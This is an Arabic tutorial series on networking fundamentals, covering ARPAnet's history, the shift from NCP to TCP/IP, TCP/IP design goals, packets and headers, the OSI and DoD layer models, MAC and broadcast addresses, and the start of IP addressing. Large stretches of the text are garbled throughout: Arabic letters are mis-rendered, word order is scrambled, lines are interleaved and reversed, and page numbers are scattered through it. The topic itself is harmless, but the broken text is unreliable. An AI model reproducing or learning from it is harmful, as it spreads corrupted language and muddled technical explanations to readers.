ARPA بدات مھمتھا بانشاء شبكة بما يبدو وكانھا متطلبات مستحیلة . Network كان يسمي ARPAnet ستخدم فيالذي ي اللغة او البروتوكول

89

) .NCP ( Control Protocol ببساطة ال NCP ظھرت الحوجة الي بروتوكول جديد الن ARPAnet مع نمو

. الكبیرة يغطي كل احتیاجات الشبكةاللغة . بلغة انسانیة ال تحتوي اال علي كلمات قلیلة NCP يمكننا ان نشبه ال

ولكن اذا دخل المزيد من , س لالتصال ببعضھم يمكن ان تمكن قلیل من الناالذين يريدون ان يتحدثوا في كثیر من المواضیع يجب ان تطور لغة البشر

. التخاطبلھا الكثیر من العیوب ولیست بالقوة الكافیة لشبكة قوية بدات في NCP اذا

. السیطرة النمو خارج عن . وير لغة شبكة جديدةقادا الي البحث عن تط ARPAnet ونمو NCP عیوب ال

IP / TCP:میالد ال -4

A Protocol for Packet Network اطلق اثنان من رواد االنترنت1974في . Interconnection وھي ورقة تصف ال( Transmission Control Protocol ) TCP وھو بروتوكول في ال Protocol suite وسیحل في النھاية محل. NCP

مسؤول من التاكد ان TCP في الحلقات الدراسیة القادمةوكما سندرس . وصلت الي الكمبیوتر االخر البیانات

الي حزمة جديدة من االختبار والتطوير المتزايد لھذه اللغة قاد1978في Internet Protocol / Transmission Control Protocol )البروتوكوالت سمیت

) .IP /TCP ARPAnet .ك لغة اساسیة لIP / TCPبال NCP ل قرر بان يستبد1982في االنترنت من ذلك الحین نمت من جذور. ازيلت من الوجود ARPAnet 1990في . لیقابل متطلبات التغیر لالنترنتIP / TCPوطور ال ARPAnet ,ال IP / TCP:تصمیم ال اھداف -5

IP /TCPلة فيوالبروتوكوالت الداخ, الحالیة تطور الي وضعیتهIP suite / TCP تمله عدة اھداف . IP protocol suite /TCPمع الوقت اختبارھا و تعديلھا وتطويرھا

90

. كبیرة ومتطورة تصمیم لیكون بروتوكول فعال ل شبكة : بعض من ھذه االھداف يشمل

: االستقاللیة عن نوع االجھزة -1او اي جھاز mainframe, PC,Mac ,حزمة بروتوكول يمكن استخدامھا علي ال

. كمبیوتر : االستقاللیة عن نوع البرمجة -2

. مصنعي البرمجیات والتطبیقات حزمة بروتوكول يمكن ان يستخدمھا مختلفبدون ان يكون فیھما وھذا يسمح لجھاز في موقع باالتصال بجھاز في موقع اخر

. نفس البرنامج : عالیة اصالح الخطا والقدرة علي حمل نسب خطا -3

. ة البروتوكول متمیزة ب اصالح اوتوماتیكي الي بیانات ساقطة او مفقودةحزمھذا البروتوكول يستطیع اصالح اي انقطاع من اي جھاز في اي جزء من الشبكة

. نقطة في البیانات المرسلة وفي اي : نظام كفؤ بتحمیل اقل -4

ة مع البیانات كمیة قلیلة من البیانات االضافیة المتحرك حزمة البروتوكول تحمل التحمیل الزائد. القلیلة تسمي التحمیل الزائد ھذه البیانات. المرسلة

Overhead او صندوق استخدم الرسال , رسالة يشبه ظرف استخدم ل ارسال . اشیاء كبیرة ومالت باكثر من حمولتھا العادية

و القدرة علي اضافة شبكات علي الشبكة الداخلیة بدون عرقلة الخدمة ا -5 . الشبكة الداخلیة اسقاط

خالل شبكة حزمة البروتوكول التي فیھا البیانات يمكن ان تشق طريقھا -6 لیكون ھذا ممكنا مخطط عنونة. الكمبیوترات الداخلیة الي اي اتجاه محتمل

وحید وذو مغزي يجب ان يستعمل لذلك اي كمبیوتر يحرك البیانات يمكنه ان . انات كما تتحرك داخل الشبكةطريق ل كل قطعة بی يحسب افضل

IP /TCPوخالل دراستنا سنعرف ھل غطي , االھداف تم تطويره لیقابل ھذه

. بالفعل اھداف تصمیمه ام ال

: مصطلحات ھامــــــــــــــــة

Protocols . االتصاالت مجموعة من القواعد والمعايیر التي تحكم

91

Network administrator

. ويراقب ويحل مشاكل الشبكةالذي يركب الشخص

Host في شبكة او ) printer , mainframe, server, workstation (اي جھاز مثل

IP / TCP.شبكة داخلیة فیھا عنوان

ARPAnet . االنترنت سلف, شبكة وكالة ابحاث المشاريع المتطورة

Network Control Protocol NCP

IP /P TC.البروتوكول المستخدم قبل

TCP(Transmission Control Protocol . االتصال بین االجھزة البروتوكول الذي يصف

IP /TCP( Internet Protocol/ Transmission Control Protocol

. االنترنت حزمة من البروتوكوالت اشتركت لتكون لغة

92

)الجزء الثالث (IP/TCP بروتوكول


: ما ھي البروتوكوالت

القواعد والمعايیر لالتصال تستخدمھا البروتوكول ھو قاعدة او مجموعة من . الكمبیوترات عندما ترسل البیانات ذھابا وايابا

وا كال الراسل والمستقبل المشتركان في البیانات المرسلة يجب ان يعترف . البروتوكوالت بنفس

Hosts ,ايضا وتسمي, الكمبیوترات المرسلة والمستقبلة , لتبادل البیانات

باقة اخر كل Host الي Host عندما يرسل. يجب ان يوافقا علي شكل البیانات . 0 و 1كالھما يجب ان يوافقا علي معني وطريقةالتنسیب الي 0sوال 1sال

. سل تمثل العناوين وجزء يمثل البیاناتالمعلومات التي تر جزء من

وتشبه . مثلما لبیتكم عنوان خاص في شارعكم , خاص له عنوان HOST كل Host البیانات التي تسلم الي ال. عنوانك ايضا خطابات البريد التي ترسل الي

ترسل المعلومات يجب ان تفھم التي Host ال. المناسب تعتمد علي عنوانه البیانات ان تجد لكي تستطیع Data ان الصحیح بین البیاناتكیف تجد العنو

. طريقھا الي وجھتھا

يجب اوال ان يتفقوا علي , في االتصال كما ذكرنا سابقا عندما تبدا الكبیوترات . بروتوكول لیستخدموه

عناوين protocol stack .او protocol suite البروتوكوالت تسمي مجموعةعندما ندمج . لھا اصدار خاص يساعدھا في االتصال حدالبروتوكول الوا

protocol مجموع البروتوكوالت الناتجة تسمي , البروتوكول مع بروتوكوالت اخريIP /TCP. suite كمثال ھو. protocol suite في كمبیوتر متصل مع الشبكة ,

لكمبیوتر عندما ا protocol stack .البرنامج الذي يجمع البیانات لالرسال يسمي protocol stack .فانھا تتحرك من خالل ال, البیانات

مملوكة بعضا منھا بروتوكوالت. ھناك الكثیر من البروتوكوالت المستخدمة الیوم

93

طورت الھداف محددة لتقابل حاجات خاصة لبعض ال. ذات استخدام خاص software او. hardware

: وم في اتصاالت الشبكات تشملالی protocol suites واحدة من اشھر ال : SPX /IPX/ 1 في انظمة واستخدمته Novell قامت بتصمیمه شركة protocol suite ھو

. تشغیلھاSPX /IPXاختصار لSequenced Packet / Internetwork Packet Exchange

Exchange :Apple Talk / 2

مته في انظمة واستخد Apple قامت بتصمیمه شركة protocol suite ھو . تشغیلھا

:IP /TCP/ 3

يعني اي واحد يريد ان يستخدم . واصبح معیار االنترنت protocol suite ھو IP suite / TCP.ال االنترنت الزم يستخدم بروتوكول

.. طیب ندخل في العمق شوية

: البروتوكوالت تحرك حزم البیانات

بتقسیمھا الي IP / TCPبروتوكول يقومالي اخر Host عندما ترسل البیانات من . الحزم الرزم او packets قطع تسھل ادارتھا وھذه القطع تسمي

مثل packets ال packets .البروتوكول يحدد كیف سیكون شكل وعنوان ال . او البیانات Data الصناديق تستخدم لشحن ال

معھا معلومات الحزمة التي ترفق وھي headers مرفق معھا packet كلواخذ البیانات Packets ال والتي تجعل من الممكن اعادة تجمیع. للداللة علیھا

. االصلیة في وجھة البیاناتالحزمة يرفق مع حزمة البیانات لنفس السبب الذي او معلومات Headers ال

. المرسل عبر البريد الي شخص اخر يلصق الجله الديباجة علي الطرد

94

ھو مثلي عندما ارسل طرد الي ل البیانات الي كمبیوتر اخرالكمبیوتر الذي يرس . انسان اخر

: سنضرب مثا ل عملي يوضح المسالة

الدراجة تمثل عندنا . اذا انا عاوز ارسل دراجة البن اختي في مدينة اخرييجب ان اتبع الرسل الدراجة. البیانات التي نريد ان نرسلھا الي كمبیوتر اخر

. الت معینة حتي تصل الدراجةقواعد وبروتوكو علي طرد اضع الدراجة في طرد او عدة طرود اذا كانت ال يمكن ان توضع -1

packets .في ھذا المثال الطرد يمثل ال, واحد . علي الطرود الخطوة التالیة ھي وضع عنوان, وضعنا الدراجة داخل الطرود -2

استخدم يجب ان: ن علي الطرود ولكن ھناك بروتوكوالت وقوانین لوضع العناويعنوان الديباجة يجب ان يحتوي . اسم اختي الصحیح وكذلك عنوانھا الصحیح

, اجزاء المعلومات الضرورية حتي تصل الطرود الي وجھتھا الصحیحة مثال عليوھذا يشبه . مفتاح المدينة , المحافظة او االقلیم , المدينة , عنوان الشارع

علي حزمة البیانات Headers معلومات الحزمة ا يضععندمIP / TCPتماماpackets التي سترسل .

البیانات كذلك نضع عنوان المرسل علي الديباجة وھذا يشبه ايضا حزمة -3

. التي تحتوي علي معلومات المصدر المرسلة منه البیانات لكل طرد ھناك مكان محدد لكل معلومات العنونة ھذه ويجب ان امال-4

. لن تصل الي وجھتھاواال ) 5من 1( اخیرا اشیر الي اي واحد من الطرود مطلوب ان يفتح بالكتابة علیھا -5الخ , ثم الثاني , وھذا يساعد اختي لتعرف اي طرد تفتح االول .. .الخ (5من 2(

. بسھولة اعادة تجمیع الدراجة فتستطیع.. ي نوع خدمة استالم اريد ان محتاج ان اقرر ا, جاھزة عندما تكون الطرود-6

تعتمد علي خدمة الرسائل او نوع الشركة التي استعمل وصیغ ديباجات الطروداذا DHL ,الطرود في صناديق ال ح اضع DHL اذا اخترت ال: اخترتھا مثال

. االرامكس وھكذا بالتاكید ح اضع صناديقي في ARAMEX EXPRESS اخترت الاو format ب packets بیوتر يتم تغلیف النفس الشي يحدث في عالم الكم

اذا . صیغ تكون مناسبة للشبكة الفیزيائیة الموجود داخلھا الكمبیوتر المرسل

95

الحزم يجب ان تكون Ethernet او شبكة Ethernet network الكمبیوتر علي كان اذا كانت الحزم علي Ethernet work .المناسبة لالنتقال عبر ال علي الصیغة

n Ring network Tokeاو شبكة Token Ring الحزم مفروض تكون علي صیغ .Token Ring وياخذ الطرود اتصلت برجل البريد لیاتي, االن وصلنا الي مرحلة التسلیم -7

.. سنعرف االن.. لماذا اذن !!! ولكن ال انا وال ھو سیكون من سلم الطرد , نقل متحرك من ماكن الي اخرالبیانات المكتوبة بالصیغة المناسبة في نظام

يحتمل ان تاخذ طرق مختلفة لكنھا في النھاية ستصل الي نفس الطرودعنوانھم اعتمادا علي العنوان الذي وضعته علي سیتم تسلیمھم الي. الوجھة

مشكلة الشركة ستخبرني الني بنفس الفھم اذا كانت ھناك. الديباجات . وضعت عنوان المرسل علي الطرود

تجمیع الدراجة وتستطیع ان تعید, بعد ان تصل الطرود الي اختي ستفتحھم -8

لحزم بالمثل الكمبیوتر المستقبل. بناء علي المعلومات التي علي الديباجات البیانات يمكن ان يجمع البیانات بناء علي المعلومات المرفقة مع الحزم وھي ال

. Headers ان تاخذ المعلومات التي تريدھا من اخیرا سترمي صناديق الطرود بعد -9

والصناديق كل مھمتھا ان توصل والذي تريده حقیقة ھو الدراجة, الديباجات نفس . نھاية مھمتھا الدراجة الي وجھتھا الصحیحة اذن الحوجة للصناديق بعد

الحزم تكون , لكي نرسل البیاناتIP / TCPالفكرة تستخدم عندما نستخدم ال وتنبذ بعد ان تستخدم المعلومات الھامة, ات مرفقة معھا مبنیة علي معلوم

. المرفقة وتم تسلیم البیانات المطلوبة الي البرنامج الذي طلبھا

الحظ ان . ادناه تصف كمبیوتر احمد وھو يرسل بیانات الي كمبیوتر سارة الصورة في. تجزيئھا الي عدة حزم يحتوي كل منھا علي رقم متسلسل البیانات تم

تعید تجمیع البیانات مرة اخري الي صیغة غیر مجزاة الكمبیوتر المستقبل سارة . التي ارسلت بھا يعني تتجمع في صورتھا االصلیة.

96

: ھامــــــــــــــــــة مصطلحات

uiteprotocol s مجموعة من البروتوكوالت

protocol stack

مجموعة بروتوكوالت ترسل وتستقبل البیانات

Headers علي العنوان ومعلومات معلومات صغیرة تكون مرفقة مع الحزم وتحتوي دائما

مسار البیانات

97

)الجزء الرابع (IP/TCP بروتوكول


النموذج القیاسي للشبكاتOpen System Interconnection

::::.OSI.::::

الرغبة في انشاء شبكة لتبادل المعلومات والبیانات فانه البد من ان تكون عند

. متوافقة في طريقة االتصال الشبكي االجھزة ) International ) ISOلمقايیس المنظمة الدولیة ل1977لذلك في عام

Organization for Standardization تبنت نموذج ال Open System ) .OSI (Interconnection

مختلف الوظائف من سبع طبقات تتیح للدارس فھم OSI ويتكون نموذجلفھم آلیة والعملیات في الشبكة، واألھم من ذلك أن ھذا النموذج يشكل بنیة

انتقال المعلومات في الشبكة، إضافة إلى إمكان استخدامه لتمثیل آلیةانتقال من البرامج) data packets (أو حزم البیانات) information (المعلوماتعبر وسط ) برامج الجداول اإللكترونیة أو برامج معالجة الكلمات: مثل(التطبیقیة

األسالك: مثل(في الشبكة النقل)) wires(ما، حتى إن مج تطبیقي على كمبیوتر آخر على شبكةإلى برنا

.اختلف نوع شبكة المرسل عن نوع شبكة المستقبل

الكثیرة بانه يستخدم لتقسیم المھام OSI يمكننا تعريف الھدف من انشاء ال . الي خطوات صغیرة.التي يتطلبھا نقل البیانات من كمبیوتر الي اخر

يتكون من OSI وال, او الطبقات layersالخطوات الصغیر ة تسمي ال ھذه . سبعة طبقات

. لكل طبقة مسئوولیاتھا الخاصة بھا

: الطبقات السبعة ھي

Application/ 1 Presentation / 2

Session / 3

98

Transport/ 4 Network/ 5

link-Data/ 6 Physical/ 7

طريقة تساعدھو طريقة التقسیم النواع البیانات المتصلة ب OSI نموذج الNetwork Administrator مدير الشبكة في معالجة مشاكل الشبكة .

: مسئولیة كل طبقة

كل طبقة تضع , الطبقات السبعة في الشبكة في اثناء مرور البیانات علي . علي الحزمة Header معلومات بسیطة تسمي

: طیب االن ح نلقي نظرة سريعة علي مھمة كل تطبیق

lication Layer The App/ 1 : البرنامج طبقة التطبیق او

ادارة االتصاالت الھدف من طبقة التطبیق ھو OSI اعلي طبقة في نموذج ال

او قیاسیة تطبیقات او برامج طبقة التطبیق ھي برامج معیارية. بین التطبیقات لتفسیر ذلك عندك المبرمج اللي . تتفاعل مع البرنامج الجاري في الشبكة

كتبه بحیث يتفاعل مع البرامج القیاسیة الموجودة في طبقة Word رنامجب كتب save ,يستخدم برامج الشبكة القیاسیة لیقوم ب Word برنامج . التطبیقdelete , copy والمستندات للمجلدات .

. طبقة التطبیق ھي التي تستقبل فیھا البرامج البیانات وتطلبھا ايضا . لھذه الطبقةكل الطبقات االخري تعمل

The Presentation Layer / 2

: طبقة التقديم

. التطبیق مباشرة واعلي طبقة الجلسة طبقة التقديم تلي طبقة . يتم تبادلھا طبقة التقديم تضیف ھیكل لحزم البیانات التي

او رمز مھمة طبقة التقديم الرئیسیة ھي التاكد من الرسالة التي ارسلت بلغة

99

.تر المستقبل ان يفھمھا يستطیع الكمبیويحتمل تقوم بترجمة البیانات الي رموز مفھومة البروتوكوالت في طبقة التقديم

او Session ترسل الي طبقة بعد ذلك تضغطھا ويحتمل تشفیرھا قبل ان . الجلسة التي تلیھا

The Session Layer/ 3

: طبقة الجلسة

وتدير الجلسات بین . اء االتصاالت اثن تتحكم في الحوار. تلي طبقة التقديم كیفیة , مثل كیفیة انشاء اتصال بروتوكوالتھا تغطي مواضیع. االطراف المتصلة

. وكیف يفصل االتصال عندما تكتمل الجلسة, استخدامه . عندما يبدا االتصال تقوم طبقة الجلسة بمراجعة االخطاء المرسلة

. في اثناء تبادل البیاناتمعلومات مسیطرة علي حزمة البیانات تضیف

The Transport Layer / 4 : طبقة النقل

. التي تصل تضمن الحزم

. توسس لالتصال وترسل تقارير بوصول الحزمواطالق االتصاالت , معالجة , تمد بوسائل تاسیس بروتوكوالت ھذا التصمیم

.. لالجھزة المشتركة في االتصال

The Network Layer / 5 : لشبكةطبقة ا

. مسئولة عن تمرير البیانات بناء علي عناوينھا المنطقیة

. وتعید تجمیع الحزم اذا كان ضروريا تجزئ . الشبكات تحرك الحزم من مصدرھا الي وجھتھا خالل

Link Layer-The Data/ 6 : البیانات طبقة ربط

. يتم فیھا تجھیز البیانات لیتم اخیرا تسلیمھا للشبكة

وھو مصطلح يستخدم ل وصف حزم البیانات الثنائیة( ف الحزم في اطار يتم تغلی

100

) .binary data ( البروتوكوالت في ھذه الطبقة تساعد في عنونة واكتشاف . البیانات التي ستحول اخطاء

Logical Link Control االولي: تتكون طبقة ربط البیانات من طبقتین ثانويات ) LLC (والثانیة. نطقیة او وصلة السیطرة الم) . MAC ( Media Access Control

. كل طبقة ثانوية تقدم خدماتھا الخاصةLLC مثال, بروتوكوالت طبقة الشبكة وطريقة دخول المیديا تمثل واجھة بین

Ethernet او. Token Ring MAC تعالج االتصال مع المیديا الفیزيائیة او توصیالت الشبكة الفیزيائیة مثل pair -stedtwiاو. coaxial cabling

The Physical Laye/ 7 :الطبقة المادية

بتحديد كیفیة ارسال واستقبال قطع وتقوم OSI ھي اخر طبقة في نموذج ال

. البیانات المتحركة في اسالك الشبكةاذ يضع قطع , التطبیق في المنطقة الساخنة من العملیة كلھا يعمل ھذا

وھنا يمكننا ان نتحدث عن البیانات ك , وياخذھا منھا كالبیانات في االسال . شرائح وحزم

OSI :كیف يعمل نموذج.. واالن

طبقة التطبیق OSI .يبدا في قمة نموذج ال packets الحزم تخلیق وتصنیع

وتمررھا الي االسفل الي طبقة التقديم حیث تاخذ البیانات التي سترسلطبقة التقديم تمرر حزمة البیانات الي . جديدةاو معلومات header توضع علیھا

معلوماته علي حزمة البیانات وبنفس الطريقة يقوم كل تطبیق بوضع, اسفل . حتي تسلم في النھاية الي الطبقة المادية

, بتقسیم الحزم علي اسالك الشبكة physical layer التطبیق المادي يقوم . طريقھا الي وجھتھا وتستمر البیانات في

اسفل النموذج من, حزم البیانات تتحرك في اتجاه معاكس , في مكان الوصول . الي االعلي

الحزمة خارج اسالك التطبیق المادي في وجھة حزمة البروتوكول يقوم باخذالبیانات تختبر طبقة ربط. الشبكة ويمررھا الي االعلي الي طبقة ربط البیانات

تكن ھذه اذا لم. قة ربط البیانات علي الحزمة معلومات الحزمة التي وضعتھا طب اما اذا كانت ھذه وجھة الحزمة تقوم. وجھة الحزمة فان الحزمة يتم اعدامھا

101

طبقة التطبیق التي ارسلت مع header بروتوكوالت تطبیق ربط البیانات بنزع . وتمرركل الحزمة الي االعلي الي طبقة الشبكة الحزمة

. البیانات الي قمة النموذج حتي تصلويتكرر ھذا في كل طبقة

يتصل مع نفس التطبیق من بھذه الطريقة اي تطبیق من الكمبیوتر المرسلlayer - peerوتسمي ھذه اتصاالت طبقة النظیر. الكمبیوتر المستقبل

.communication

DoD :نموذج

OSI .تم تطويرھا قبل ان ينشر حتي نموذج الIP / TCPحزمة ال . كمرجع OSI ال تستخدم نموذج الIP / TCPنتیجة لذلك فان حزمة

IP /TCPتم تطويره باستخدام نموذج ال) DoD ( Department of Defense . كمرجع

يستخدم للمقارنة OSI والسبب ان ال OSI لكن مھم جدا انك تتعامل مع ال

102

. وباقي حزم البروتوكوالتIP / TCPبین حزمة . علي اربعة طبقات DoD يحتوي نموذج ال OSI علي خالف نموذج ال

البیانات بنفس الطريقة التي يعالج بھا بمعالجة DoD مع ذلك يقوم نموذج ال . عدد مراحل معالجة البیانات فقط االختالف في. البیانات نفس OSI نموذج ال

: وزارة الدفاع او DoD طبقات نموذج ال

Application / 1الجلسة في + التقديم + يغطي نفس المھام ل التطبیق

OSI .نموذجTransport / 2يغطي نفس مھام طبقة النقل في. OSI

Internet / 3يغطي نفس مھام طبقة الشبكة في. OSI Network Interface Layer / 4 المادية+ يغطي نفس مھام طبقة ربط البیانات .

. فیھا تفصیل عمل كل طبقة علي حدة الدروس القادمة سیكون

اختصر كثیر من DoD وكیف ان ال الجدول التالي يوضح مقارنة بین النموذجین

. في تصمیمه OSI مھام ال

103

مصطلحات ھامـــــــــــــــة )ISO(International Organization for Standardization

: المنظمة الدولیة للمقايیس

OSI .صدقت علي نموذج ال المنظمة التي )OSI(System Interconnection model Open

النموذج المرجعي للشبكات

المستخدم في تقسیم المھام التي يحتاج الیھا نموذج الطبقات السبعة . لتحريك البیانات من كمبیوتر الي اخر

Layer : الطبقة

بتنظیم المھام بین البروتوكوالت المختلفة حتي ال يحدث ويقوم OSI جزء من ال

. او نقص في عملھاتعارض )DoD(Department of Defense

)االمیركیة طبعا( الدفاع وزارة

layer Communication-Peer : اتصاالت طبقة النظیر

تطبیق من الكمبیوتر المرسل يتصل مع نفس نوع من االتصاالت فیھا اي

. التطبیق في الكمبیوتر المستقبل

104

)-1-الجزء الخامس (IP/TCP بروتوكول


The Network Interface Layer

ھذه الطبقات . واجھة الشبكة وطبقة عنوان االنترنت وطريق الحزم طبقةكما عرفنا . بتعريف كیفیة حركة الحزم من والي الشبكة تتفاعل مع الشبكة

معلومات صغیرة علي الحزم مثلما توضع الديباجات قا البروتوكوالت تضعساب . علي الطرود التي سترسل عبر البريد

طبقة واجھة الشبكةThe Network Interface Layer

او طبقة Network Interface Layer ھي الIP / TCPادني طبقة في كتلة ال . واجھة الشبكة

ة واجھة الشبكة ھي تعريف كیفیة اتصال كمبیوتر طبق المسئولیة الرئیسیة ل . مع الشبكة

عملیة استالم البیانات ھذا اھم جزء فيقیاسا الي طبیعة الكمبیوتر يجب ان يتبع قواعد ارسال واستقبال البیانات

. تركیب الشبكةطبقة الشبكة حتي ھناك طريق واحد لتعرف كیف يتفاعل الكمبیوتر مع

. مع مثال واقعيتستطیع ان تقارنھا

الحد لنفرض انك سترسل كرت تمني بالشفاء وكیكة شیكوالته :: مثال . اصدقاءك في المستشفي

تجھیز االشیاء التي سترسلھا كتغلیفھا بمظھر حلو انت مسؤول من اول خطوة . ثم كتابة عنوان علیھا

. انت عملت اللي علیك حتي ھنا . یم اخر له اجراءاته الخاصة بهلنظام تسل ھي تمريرھا الخطوة التانیة

كما يجب ان . لتوصیل المغلف يمكنك ان تستخدم أي شركة خدمات سريعة

105

, كیفیة كتابة العنوان مثال, تتبع القواعد التي تتعامل بھا الشركة مع زبائنھا . )رجوعه في حالة( عنوان ضمان المغلف , كیفیة الدفع للموظف المسئول

ي المغلف مش حیھتم بكیفیة وصوله الیه فقط حیكونبعد ان يصل الي صديق . سعید باالھداءالموظفین فیھا . المستشفي قسم االستقبال في تشبه طبقة الشبكة

ان يقرروا ما يستقبلوا كثیر من االشیاء المرسلة لمن في المستشفي ويجبا يقومو , بعد ان يروا بان ھديتك معنونة بصورة صحیحة. سیرسل منھا للمرضي

سیقوم ھو بفك الھدية لیاكل الكیكة ويقرا الكارت . بتمريرھا الي صديقك . معھا المرفق

ما ستقوم به طبقة الشبكة في كمبیوتر موصول بشبكة مشابه لما ستقوم به . مع خدمة ارسال الھدية كشركة انت

عند وصول . والرسالھا طبقة واجھة الشبكة تستخدم الستقبال حزم البیاناتاالستقبال تقوم طبقة الشبكة بتمثیل دور قسم, بواسطة كرت الشبكة الحزمة

في المستشفي وتقرر تمرير الحزمة الي كتلة او حزمة البروتوكول لمعالجتھا Hardware address .علي عنوان العتاد او

البرتوكول يتم تمريرھا في النھاية الي في حال تم تجھیز الحزمة بواسطة كتلة .لتوضع في الشبكةطبقة الشبكة

والتي Header واجھة الشبكة المعلومات المرفقة مع الحزمة في تطبیق . الحزمة تحتوي علي معلومات عنوان

. او عنوان العتاد hardware address ضمن معلومات الحزمة ھناك عنوان اسمه

Hardware Address عنوان العتاد

. معلومات العنوان تحتوي عليr headeمع أي حزمة من البیانات معلومات عنھا . الصحیح ھذه المعلومات المرفقة تساعد الحزمة علي الوصول الي المكان

معلومات العنوان ھذه تاتي من عنوان فیزيائي يطبع علي أي كارت شبكة . عندما يصنع الكارت

. ھذا العنوان لن يتغیر طالما يعمل الكارت : التالیةالعنوان أي من االسماء يطلق علي ھذا

Hardware Address / 1 address)MAC(Media Access Control / 2

Ethernet address/ 3 Physical address/ 4

address )NIC(Network Interface Card / 5

106

. خاص بكل كروت الشبكات ايا كانت الشركة المصنعة hardware عنوان الوھو يشبه . العنوان في hexadecimal رقم سداسي عشري12تتكون من

: ھذا5A:92:F9:0C:0A:00

binary ,انظمة ترقیم مستخدمة في صناعة الكمبیوتر ھي اكثر ثالثة :::: .hexadecimal , decimal يعد النظام العشري مناسبا بالنسبة للبشر ، بینما نظام العد الثنائي يعتبر::

عشر وسط أو توفیقمناسبا بالنسبة لأللة ، ويعتبر نظام العد السادس ::بینھما

وھو خاص بمصنع توضح رقم التصنیع hexadecimal اول ستة ارقام من ارقام ال

. كارت الشبكة . مصنع كارت الشبكة اخر ستة ارقام تشكل رقم تسلسلي خاص قام بتحديده

:: مالحظة الراسل للحزمة يجب ان يعرف عنوانIP / TCP ,اتصاالت لكي تحدث كل

hardware جھة التسلیمو . وجھة hardware يجب ان تحتوي علي عنوانIP / TCPتسلم حزمة ال لكي

. التسلیمالقسم من الحزمة الذي يحتوي , وصول الحزمة الي كارت الشبكة في حاليفحص لمعرفة ما اذا كانت الحزمة ھي المقصودة , الھدف hardware عنوان ال

الھدف وافق ) كارت الشبكة الھدفhardware ) ال اذا كان عنوان. لذلك الجھاز مرسلة الي كل االجھزة بما يسمي كارت الشبكة المرسل او اذا كانت الحزمة

اذا . للمعالجة IP / TCPالبروتوكول فان الحزمة تمرر الي كتلة Broadcast ,بالفان الحزمة packets ,للحزمة الھدف مختلف بالنسبة hardware كان عنوان ال . ذتعدم او تنب

Broadcast Packets الحزم لعدة كمبیوترات مرة واحدة ارسال

كما ذكرنا سابقا عندما تتحرك . ان تكون معنونة للكمبیوتر أي حزمة يجب

كمبیوتر سیقوم بفحص أي حزمة لیعرف أي منھا كل, الحزمة خالل الشبكة . الكمبیوتر hardware معنون الي العنوان الخاص ب

الشبكة كل واحد من االجھزة ياخد دي كده الحزمة ماشیة فييعني بالبل ::

كده يمكن :: يرسلوا له منھا اللي مرسل لیه وبس ويسیب الباقین النھم لم

107

. وضحت اكتر ترسل لكل االجھزة في وقت واحد ؟ انھا packet لكن ھل يمكن للحزمة

::نعم::االجابة ھذا . في الشبكة مرة واحدة الي كل االجھزة حزمة البیانات يمكن ان ترسل

ھذه الحزمة broadcast packet .النوع يسمي ارسال حزمة لعدة اجھزة. المرسلة لجھاز واحد تحتوي علي عنوان مختلف عن عنوان الحزمة العادية

: FF:FF:FF:FF:FF:FFشكله كالتالي

The Internet Layer طبقة االنترنت

. طبقة واجھة الشبكة وطبقة النقل بینIP / TCPطبقة االنترنت تقع في نموذج, المسئولة من عنونة وتوجیه الحزم طبقة االنترنت تحتوي علي البروتوكوالت

: تشمل protocols وھي تحتوي علي عدة برتوكوالت:: IP::Internet Protocol/ 1 ::ARP::Address Resolution Protocol / 2 ::ICMP::olInternet Control Message Protoc/ 3

IGMP::Internet Group Message Protocol / 4

108

)-2-الجزء الخامس (IP/TCP بروتوكول


The Internet Layer طبقة االنترنت

. الشبكة وطبقة النقل ةبین طبقة واجهIP / TCPطبقة االنترنت تقع في نموذجوهي تحتوي علي عدة , وتوجیه الحزم طبقة االنترنت تحتوي علي البروتوكوالت المسئولة من عنونة

: تشمل protocols برتوكوالت:: IP::Internet Protocol/ 1 ::ARP::Address Resolution Protocol / 2 ::ICMP::Internet Control Message Protocol/ 3 ::IGMP::ternet Group Message Protocol In/ 4 IP:: Internet Protocl::بروتوكول االنترنت -1

هذا IP / TCP .هو البروتوكول الرئیسي في طبقة االنترنت في كتلة ال بروتوكول االنترنت . الي حزمة IP address من تحدید مصدر ووجهة ال البروتوكول مسئول

logical یطلق علي العنوان المنطقي IP address رنتنجد ان عنوان بروتوكول االنتaddress بتخصیصه للكمبیوتر هوالذي یقوم مدیر الشبكة .

. كل كمبیوتر في الشبكة له عنوان بروتوكول انترنت خاص به

IP address :مثال لل 192.168.2.51

**********

وا انا بكتب المصطلح وترجمته طیب كان ما الحظت زي, اوكي شباب عاوز انبه علي حاجة هامة ::., لكن في عالم الواقع عندما تتعامل مع االجهزة , االصلي ممكن اكتب الترجمة وانسي المصطلح

باللغة العربیة في اشیاء معینة انت ح تلقاها مكتوبة في صورة مصطلحاتها وحتي اذا كان نظام التشغیلمكتوب عنوان بروتوكول االنترنت ابدا اال في مش ممكن تلقاه IP address مثال . االصلیة . تاني غیر االعدادات مكان

هي هامة لكل من , االنجلیزي العادیة یبقي نتفق علي حاجة وهي المصطلح الثابت یعني مش كلماتمجال تقني أي كان لماذا ؟ النه اذا ظهر علم جدید وكل من یرید ان یتقدم في,,, یرید ان یطور نفسه

109

اوك .. تنتظر ترجمتها!! ضعیف في اللغة االنجلیزیة حتعرفها كیف جدیدة في مجالك وانتوتكنلوجیا . یبقي في النهایة انسي ومش ح تتقدم ابدا, من یترجمها لك بصورة مقبولة بعد كم من الزمن ستجد

ه واكرر بعد ما اترجم المصطلح, مش حاجة كثیرة حاجة واحدة وبس , احنا محتاجین ایه االن طیباالنجلیزیة یعني اذا عدة مرات مش حاستمر في كتابته بالعربي واالنجلیزي ساكتفي فقط بكتابته باللغة

اخر للترجمة نفسها فهي تفهم علي طول ان ده عنوان االنترنت وهي اختصار IP address لقیت االنترنت و ح نبدا من عنوان . اصال عنوان بروتوكول االنترنت واختصارا نقول عنوان االنترنت

. بدانا به النه ستعتمد علیه كثیر من الدروس القادمة IP address .ساسمیه في أي شروحات::.

**********

. المدیر للكمبیوتر ویجب ان یكون العنوان خاصا بالشبكة الموجود فیها هذا العنوان یخصص بواسطةوالجزء االخر یمثل host ,یمثل الشبكة التي یوجد فیها الجهاز IP address جزء من ال

. نفسه الموجود علي تلك الشبكة الجهاز

الخطاب الذي یرسل الیك سیسلم الي منزلك IP address .الشارع الذي تسكن فیه یشبه ال :: . بسبب العنوان المنطقي

الرسالة تصلك لسبب رئیسي وهو ان مرسل IP address .نشبه االیمیل تبعك بال او یمكن ان . والنتیجة ان الرسالة ستصلك بالتاكید بسبب العنوان, استخدم عنوانك الصحیح رسالةالولكن رحلت الي بیت اخر في شارع اخر عنوانك سیتغیر وخطاباتك سترسل الي العنوان الجدید اذا

